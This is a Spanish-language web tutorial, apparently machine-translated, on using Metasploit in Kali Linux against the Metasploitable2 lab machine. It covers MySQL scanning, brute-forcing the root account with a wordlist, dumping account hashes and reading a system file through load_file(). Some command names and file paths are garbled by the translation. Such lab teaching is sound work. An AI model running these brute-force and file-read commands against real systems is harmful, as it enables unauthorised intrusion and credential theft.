Un tutorial paso a paso

Un tutorial paso a paso - Codelivly

Metasploit es un marco poderoso para pruebas de penetración y evaluación de vulnerabilidades. Se puede utilizar para probar la seguridad de redes, servidores y aplicaciones. Kali Linux es una distribución de Linux popular que viene preinstalada con muchas herramientas de seguridad, incluido Metasploit. En este tutorial, proporcionaré una guía paso a paso sobre cómo usar Metasploit en Kali Linux.

Índice
  1. ¿Qué es msfconsole?
    1. Módulos Metasploit
  2. ¿Por qué aprender y usar Metasploit?
  3. Requisitos mínimos del sistema para Metasploit
    1. Descubrimiento de MySQL con msfconsole
    2. Cuenta raíz MySQL de fuerza bruta con msfconsole
    3. Enumeración de MySQL con msfconsole
    4. Explotando MySQL con msfconsole
  4. Conclusión

¿Qué es msfconsole?

msfconsole es la interfaz tipo shell todo en uno más utilizada que le permite acceder a todas las funciones de Metasploit. Es compatible con la línea de comandos similar a Linux, ya que ofrece autocompletado de comandos, tabulación y otros atajos de bash.

Esta es la interfaz principal que le permitirá trabajar con módulos de Metasploit para analizar y lanzar un ataque a la máquina objetivo.

Módulos Metasploit

Metasploit tiene pequeños fragmentos de código que habilitan su funcionalidad principal. Sin embargo, antes de explicar los módulos, debes tener claro los siguientes conceptos recurrentes:

  • Vulnerabilidad: Esta es una falla en el diseño o código del objetivo que lo hace vulnerable a la explotación que conduce a la divulgación de información confidencial.
  • Explotar: Un código que explota la vulnerabilidad encontrada.
  • Carga útil: Este es un código que te ayuda a lograr el objetivo de explotar una vulnerabilidad. Se ejecuta dentro del sistema de destino para acceder a los datos de destino, como mantener el acceso a través de Meterpreter o shell inverso.

Ahora pasemos a los cinco módulos principales de Metasploit:

  • Auxiliar: El módulo auxiliar contiene un conjunto de programas como fuzzers, escáneres y herramientas de inyección SQL para recopilar información y profundizar la comprensión del sistema de destino.
  • Codificadores: los codificadores cifran las cargas útiles/exploits para proteger contra las soluciones antivirus basadas en firmas. Dado que las cargas útiles o los exploits contienen caracteres nulos o incorrectos, existe una alta probabilidad de que una solución antivirus los detecte.
  • Explotar: Como se indicó anteriormente, un exploit es un código que explota vulnerabilidades específicas para garantizar el acceso al sistema a través de cargas útiles.
  • Carga útil: Como se mencionó anteriormente, las cargas útiles lo ayudan a lograr el objetivo deseado de atacar el sistema de destino. Esto significa que lo ayudarán a obtener un shell interactivo o mantener una puerta trasera, ejecutar un comando o cargar malware, etc. Metasploit ofrece dos tipos de cargas útiles: cargas útiles continuas y cargas útiles por etapas.
  • Trabajo: El módulo postoperatorio le ayudará a recopilar más información sobre el sistema. Por ejemplo, puede ayudarlo a volcar hashes de contraseña y buscar credenciales de usuario para movimiento lateral o escalada de privilegios.

Puede usar los siguientes comandos para mostrar cada módulo y sus categorías:

cd /usr/share/metasploit-framework/modules
ls
tree -L 1 module-name/

¿Por qué aprender y usar Metasploit?

Antes de la llegada de herramientas como Metasploit, los evaluadores de penetración tenían que realizar todas las tareas manualmente utilizando varias herramientas, algunas de las cuales ni siquiera eran compatibles con el sistema de destino. Tuvieron que codificar sus herramientas y scripts desde cero antes de implementarlos manualmente en el sistema o red de destino. Un término como "prueba remota" que se usa hoy en día era raro. Sin embargo, eso cambió con Metasploit.

Este marco viene con más de 1677 exploits (actualizados periódicamente) para más de 25 plataformas. Esto incluye Android, Windows, Linux, PHP, Java, Cisco, etc. También viene con más de 500 cargas útiles, que incluyen:

  • Cargas útiles dinámicas que permiten a los usuarios generar cargas útiles y scripts indetectables por antivirus.
  • Cargas útiles de shell de comandos que permiten a los usuarios acceder y ejecutar comandos/scripts en la máquina de destino.
  • Las cargas útiles de Meterpreter brindan a los usuarios un shell de línea de comando interactivo que puede usar para explorar y explotar la máquina de destino.

Requisitos mínimos del sistema para Metasploit

Kali Linux (en su estado básico) puede ejecutarse con tan solo 128 MB de RAM y 2 GB de espacio en disco, pero eso no es suficiente para ejecutar Metasploit Framework. Para ello, la configuración mínima necesaria es la siguiente:

  • Procesador: Potencia de procesamiento de más de 2 GHz
  • Memoria: 4 GB de RAM (se recomiendan 8 GB)
  • Almacenamiento: 1 GB de espacio en disco (se recomiendan 50 GB)

Nota: Si está instalando Metasploit Framework como una aplicación independiente en Windows, Linux u OSX, debe desactivar su software antivirus y firewall, ya que pueden interferir con la instalación y el funcionamiento.

Si no desea instalar Kali Linux como Dual Boot en Windows, puede instalar VMware o Virtual Box en Windows. VMware lo ayuda a ejecutar Kali Linux en Windows. VMware o Virtual Box son fáciles de usar. Puede configurar su laboratorio de pruebas de penetración virtual siguiendo este tutorial:

Necesita conocimientos básicos sobre el uso de Kali Linux para usar Metasploit para piratear. Si no tienes experiencia usando Kali Linux, no te preocupes. Puede obtener la capacitación gratuita en Seguridad Ofensiva desde el siguiente enlace:

https://kali.training/lessons/introduction/

Debe tener un conocimiento básico del lenguaje de programación en Python. Los piratas informáticos utilizaron principalmente Python para fines de piratería. Bash Scripting se usa para la automatización de tareas y puedes aprender Python y Bash Scripting en Free from Udemy:

https://www.udemy.com/python-programming-beginners/

https://www.udemy.com/bash-shell-scripting-tutorial-para-principiantes/

Para comenzar a usar la interfaz Metasploit, abra la terminal Kali Linux y escriba msfconsole.

De forma predeterminada, msfconsole se abre con un banner; para eliminar esto e iniciar la interfaz en silencio, use el msfconsole ordenar con el -q bandera.

La interfaz se parece a un shell de línea de comandos de Linux. Algunos comandos de Linux Bash admitidos son ls, clear, grep, history, jobs, kill, cd, exit, etc.

Pegar ayudar o un signo de interrogación"?” para ver la lista de todos los comandos disponibles que puede usar en msfconsole. Algunas de las más importantes que utilizaremos en este artículo son:

Orden Descripción
investigación Le permite buscar en la base de datos de Metasploit según el protocolo/aplicación/parámetro dado
usar Le permite elegir un módulo en particular y cambiar el contexto a comandos específicos del módulo
información Proporciona información sobre el módulo seleccionado.
mostrar Muestra información sobre el nombre del módulo dado y las opciones del módulo actual
controlar Comprueba si el sistema de destino tiene una vulnerabilidad
juntos Es una variable específica del contexto que configura las opciones para el módulo actual
no definido Elimina parámetros previamente definidos
correr Ejecutar el módulo actual

Antes de comenzar, configure la base de datos Metasploit iniciando el servidor PostgreSQL e inicializando la base de datos msfconsole de la siguiente manera:

systemctl start postgresql
msfdb init

Ahora verifique el estado de la base de datos inicializando msfconsole y ejecutando el estado_bd orden.

Para fines de demostración, configure la máquina Linux vulnerable de código abierto Metasploitable2.

Descubrimiento de MySQL con msfconsole

Primero encuentre la dirección IP de la máquina Metasploitable. Luego usa el db_nmap comando en msfconsole con banderas Nmap para escanear la base de datos MySQL en 3306 puerto.

db_nmap -sV -sC -p 3306 <metasploitable_ip_address>

Puede ejecutar el regular nmap -p- comando para confirmar el número de puerto de la base de datos MySQL.

Utilizar el investigación opción de encontrar un módulo auxiliar para analizar y enumerar la base de datos MySQL.

search type:auxiliary mysql

En la lista anterior, puede utilizar el auxiliar/escáner/mysql/mysql_version módulo ingresando el nombre del módulo o el número asociado para analizar los detalles de la versión de MySQL.

use 11

O:

use auxiliary/scanner/mysql/mysql_version

Ahora usa el mostrar opciones Comando para mostrar los parámetros necesarios para ejecutar el módulo actual:

El resultado muestra que la única opción requerida y no configurada es RHOSTS, que es la dirección IP de la máquina de destino. Utilizar el establecer fantasmas para establecer el parámetro y ejecutar el módulo, de la siguiente manera:

El resultado muestra detalles similares de la versión de MySQL como db_nmap función.

Cuenta raíz MySQL de fuerza bruta con msfconsole

Después del escaneo, también puede forzar la cuenta raíz de MySQL a través de Metasploit. ayudante (escáner/mysql/mysql_login) módulo.

Deberá configurar el PASS_FILE parámetro a la ruta de la lista de palabras disponibles dentro /usr/share/wordlists:

set PASS_FILE /usr/share/wordlistss/rockyou.txt

A continuación, especifique la dirección IP de la máquina de destino con el comando RHOSTS.

set RHOSTS <metasploitable-ip-address>

Juntos CONTRASEÑAS EN BLANCO a verdadero si no se define una contraseña para la cuenta raíz.

set BLANK_PASSWORDS true

Finalmente, ejecute el módulo escribiendo correr en el aeropuerto.

Enumeración de MySQL con msfconsole

msfconsole también le permite enumerar la base de datos usando el auxiliar (admin/mysql/mysql_enum) módulo. Devuelve todas las cuentas con detalles como privilegios asociados y hash de contraseña.

Para ello, deberá especificar la contraseña, el nombre de usuario y la variable rhosts.

set password ""
set username root
set rhosts <metasploitable-ip-address>

Finalmente, inicie el módulo escribiendo:

run

Explotando MySQL con msfconsole

Desde la fase de enumeración, está claro que la cuenta raíz tiene privilegios de archivo que permiten a un atacante ejecutar el cargar archivo() función. La función permite explotar la base de datos MySQL cargando todos los datos del archivo /etc/password a través de la auxiliar(/admin/mysql/mysql_sql) módulo:

Nuevamente, establezca la variable nombre de usuario, contraseña y rhosts. Luego ejecute una consulta que invoque la función load_file() y cargue el /etc/contraseña archivar.

set sql select load_file(\"/etc/password\")

Los módulos Metasploit ayudan en todas las fases de las pruebas de penetración. Metasploit también permite a los usuarios crear sus propios módulos.

Este artículo resume algunos módulos centrales del marco Metasploit y muestra cómo analizar, enumerar y extraer una base de datos MySQL en la máquina Metasploitable 2.

Metasploit no es la única herramienta de prueba de penetración que usará como profesional de ciberseguridad. Hay varias otras utilidades con las que deberá familiarizarse si desea convertirse en un experto en seguridad.

Conclusión

¡¡¡Felicitaciones!!!.. Ha aprendido con éxito "Cómo usar Metasploit para piratear en Kali Linux". Espero que ahora tenga un buen conocimiento del uso de Metasploit en Kali Linux.

Si quieres conocer otros artículos parecidos a Un tutorial paso a paso puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas